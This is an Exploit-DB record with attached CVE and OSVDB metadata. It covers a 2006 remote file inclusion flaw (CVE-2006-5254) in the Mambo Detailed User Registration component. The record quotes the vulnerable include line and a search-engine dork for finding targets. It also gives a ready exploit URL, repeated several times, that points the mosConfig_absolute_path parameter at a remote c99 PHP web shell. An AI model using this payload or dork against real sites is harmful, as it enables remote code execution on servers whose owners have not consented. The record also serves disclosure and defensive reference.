ID EDB-ID:2379
Type exploitdb
Reporter k1tk4t
Modified 2006-09-16T00:00:00
Description
Mambo com_registration_detailed <= 4.1 Remote File Include. CVE-2006-5254. Webapps exploit for php platform
########################################################################
# Mambo com_registration_detailed <= 4.1 Remote File Inclusion
#
# Download Source : http://mamboxchange.com/projects/regdetailed/
# Dork = allinur:com_extended_registration
#
# Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
# Location: Indonesia
########################################################################
file ;
registration_detailed.inc.php
########################################################################
bugs ;
[at]line 25
include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
#########################################################################
example exploit ;
http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
--> ghoz, home_edition2001, iFX, and for all (friend's&enemy)
# milw0rm.com [2006-09-16]
{"id": "EDB-ID:2379", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mambo com_registration_detailed <= 4.1 - Remote File Include", "description": "Mambo com_registration_detailed <= 4.1 Remote File Include. CVE-2006-5254. Webapps exploit for php platform", "published": "2006-09-16T00:00:00", "modified": "2006-09-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2379/", "reporter": "k1tk4t", "references": [], "cvelist": ["CVE-2006-5254"], "lastseen": "2016-01-31T16:07:49", "viewCount": 17, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-01-31T16:07:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5254"]}, {"type": "osvdb", "idList": ["OSVDB:36055"]}], "modified": "2016-01-31T16:07:49", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/2379/", "sourceData": " ########################################################################\n # Mambo com_registration_detailed <= 4.1 Remote File Inclusion\n # \n # Download Source : http://mamboxchange.com/projects/regdetailed/\n # Dork = allinur:com_extended_registration\n #\n # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com\n # Location: Indonesia\n\n ########################################################################\n file ;\n registration_detailed.inc.php\n ########################################################################\n bugs ;\n [at]line 25\n\n include_once(\"$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php\");\n #########################################################################\n example exploit ;\n http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?\n ########################################################################\n Thanks;\n str0ke\n milw0rm\n google\n #e-c-h-o (all member echo community)\n\n #nyubi (all member solpotcrew community)\n --> ghoz, home_edition2001, iFX, and for all (friend's&enemy) \n\n# milw0rm.com [2006-09-16]\n", "osvdbidlist": ["36055"]}
{"cve": [{"lastseen": "2020-12-09T19:23:49", "description": "PHP remote file inclusion vulnerability in registration_detailed.inc.php in Mark Van Bellen Detailed User Registration (com_registration_detailed), aka regdetailed, 4.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "edition": 5, "cvss3": {}, "published": "2006-10-12T22:07:00", "title": "CVE-2006-5254", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5254"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:mamboxchange:extended_registration:4.1"], "id": "CVE-2006-5254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5254", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mamboxchange:extended_registration:4.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2006-5254"], "description": "## Manual Testing Notes\nhttp://[victim]/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?\n## References:\nISS X-Force ID: 28982\nGeneric Exploit URL: http://milw0rm.com/exploits/2379\n[CVE-2006-5254](https://vulners.com/cve/CVE-2006-5254)\nBugtraq ID: 20072\n", "edition": 1, "modified": "2006-09-16T00:00:00", "published": "2006-09-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36055", "id": "OSVDB:36055", "title": "regdetailed registration_detailed.inc.php mosConfig_absolute_path", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}